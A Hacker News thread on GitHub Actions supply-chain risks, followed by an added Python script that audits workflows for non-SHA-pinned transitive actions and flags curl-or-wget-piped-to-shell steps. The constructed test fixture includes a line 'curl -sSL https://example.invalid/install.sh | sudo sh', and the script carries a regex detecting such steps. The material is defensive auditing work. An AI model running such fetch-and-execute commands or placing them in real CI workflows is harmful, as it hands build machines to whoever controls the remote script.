Hacker News

maxloh today at 4:32 PM (2 replies)

GitHub Actions doesn't have a lock file, so your repo is still prone to transitive attacks if the SHA-locked actions you use also happen to use other composite actions by tags, which could be compromised in the future.


Replies

mmarian today at 7:15 PM

Agreed. Good news is GitHub will address that with Immutable Releases https://github.blog/news-insights/product-news/whats-coming-... You won't even need to use commit SHA as long as the maintainer follows this approach.

Munksgaard today at 6:38 PM

Even with a lock file, the action can download and execute arbitrary code from the internet.

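The two points above (maxloh's transitive tag references behind a SHA-pinned composite action, and Munksgaard's download-and-execute inside an action) can both be surfaced with a walk over the action graph. The script below is an added example written for this page; it is not from the thread, from GitHub, or from any real action. It reads a workflow, follows every `uses:` into that action's `action.yml`, flags any reference whose ref is not a full 40-hex commit SHA, and flags `run:` steps that pipe `curl`/`wget` output into a shell. The repository contents, the `example-org/*` action names and the commit SHA are constructed placeholders embedded inline so it runs offline; a real tool would fetch each `action.yml` from the GitHub API at the pinned ref.

```python
"""Transitive pin audit for GitHub Actions references (added example)."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

SHA_RE = re.compile(r"^[0-9a-f]{40}$")
USES_RE = re.compile(r"^\s*-?\s*uses:\s*[\"']?([^\"'\s#]+)")
RUN_RE = re.compile(r"^\s*-?\s*run:\s*[\"']?(.+)$")
# A download piped straight into a shell: no lock file can pin what this fetches.
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")


@dataclass(frozen=True)
class Finding:
    chain: Tuple[str, ...]  # path of `uses:` references from the workflow down
    kind: str               # "unpinned" or "remote-exec"
    detail: str


def split_ref(uses: str) -> Optional[Tuple[str, str]]:
    """'owner/repo[/path]@ref' -> (target, ref); None for ./local and docker:// refs."""
    if uses.startswith("./") or uses.startswith("docker://") or "@" not in uses:
        return None
    target, ref = uses.rsplit("@", 1)
    return target, ref


def audit(workflow: str, fetch_action_yml: Callable[[str, str], Optional[str]],
          chain: Tuple[str, ...] = ("workflow",), seen=None) -> List[Finding]:
    """Walk a workflow or action.yml and every composite action it references."""
    seen = set() if seen is None else seen
    findings: List[Finding] = []
    lines = workflow.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i]
        i += 1
        um = USES_RE.match(line)
        if um:
            uses = um.group(1)
            parsed = split_ref(uses)
            if parsed is None:
                continue
            target, ref = parsed
            step_chain = chain + (uses,)
            if not SHA_RE.match(ref):
                findings.append(Finding(step_chain, "unpinned",
                                        f"{target} referenced by mutable ref {ref!r}"))
            if uses in seen:  # cycle / duplicate guard
                continue
            seen.add(uses)
            nested = fetch_action_yml(target, ref)
            if nested is not None:  # recurse into the action's own steps
                findings.extend(audit(nested, fetch_action_yml, step_chain, seen))
            continue
        rm = RUN_RE.match(line)
        if not rm:
            continue
        script = rm.group(1).strip()
        if script in ("|", "|-", ">", ">-"):  # YAML block scalar: gather indented lines
            indent = len(line) - len(line.lstrip())
            block = []
            while i < len(lines) and (not lines[i].strip()
                                      or len(lines[i]) - len(lines[i].lstrip()) > indent):
                block.append(lines[i].strip())
                i += 1
            script = "\n".join(block)
        if PIPE_TO_SHELL_RE.search(script):
            findings.append(Finding(chain, "remote-exec", script))
    return findings


# Constructed sample "repositories": (target, ref) -> action.yml content. The SHA,
# the example-org names and the URL are placeholders, not real actions.
PINNED_SHA = "0123456789abcdef0123456789abcdef01234567"
SAMPLE_ACTION_FILES: Dict[Tuple[str, str], str] = {
    ("actions/checkout", PINNED_SHA): "name: checkout\nruns:\n  using: node20\n  main: dist/index.js\n",
    ("example-org/setup-toolchain", PINNED_SHA):
        "name: setup-toolchain\nruns:\n  using: composite\n  steps:\n"
        "    - uses: actions/cache@v4\n"           # tag behind a SHA-pinned action
        "    - uses: example-org/installer@v1\n",  # tag behind a SHA-pinned action
    ("actions/cache", "v4"): "name: cache\nruns:\n  using: node20\n  main: dist/index.js\n",
    ("example-org/installer", "v1"):
        "name: installer\nruns:\n  using: composite\n  steps:\n"
        "    - shell: bash\n      run: |\n"
        "        curl -sSL https://example.invalid/install.sh | sudo sh\n",
}
SAMPLE_WORKFLOW = (
    "name: ci\non: [push]\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n"
    f"      - uses: actions/checkout@{PINNED_SHA}\n"
    f"      - uses: example-org/setup-toolchain@{PINNED_SHA}\n"
    "      - run: make test\n"
)


def fetch_from_sample(target: str, ref: str) -> Optional[str]:
    return SAMPLE_ACTION_FILES.get((target, ref))


def audit_sample() -> List[Finding]:
    return audit(SAMPLE_WORKFLOW, fetch_from_sample)


if __name__ == "__main__":
    for f in audit_sample():
        print(f.kind, " -> ".join(f.chain), "::", f.detail)
```

On the constructed sample the workflow itself looks clean (both direct references are SHA-pinned), yet the audit reports two mutable tag references one level down and a `curl | sudo sh` two levels down, which is exactly the gap the thread describes.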